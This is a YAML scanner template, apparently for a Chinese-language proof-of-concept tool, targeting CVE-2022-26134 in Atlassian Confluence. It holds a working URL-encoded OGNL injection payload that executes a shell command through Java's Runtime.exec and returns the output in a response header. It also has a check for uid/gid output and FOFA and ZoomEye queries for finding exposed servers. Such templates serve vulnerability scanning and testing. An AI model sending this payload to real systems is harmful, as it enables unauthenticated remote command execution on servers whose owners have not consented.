product: Atlassian-Confluence
vName: Atlassian-Confluence OGNL表达式注入命令执行
type: 代码执行
vID:
  - CVE-2022-26134
level: 3
vDesc: Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
version: '7.4.17,7.13.7,7.14.3,7.15.2,7.16.4,7.17.4,7.18.1'
note: ''
search:
  FOFA: app="ATLASSIAN-Confluence"
  ZoomEye: app:"Atlassian Confluence"
protocol: http
link: https://github.com/vulhub/vulhub/blob/master/confluence/CVE-2022-26134/README.zh-cn.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - uid=
              - gid=
            logic: and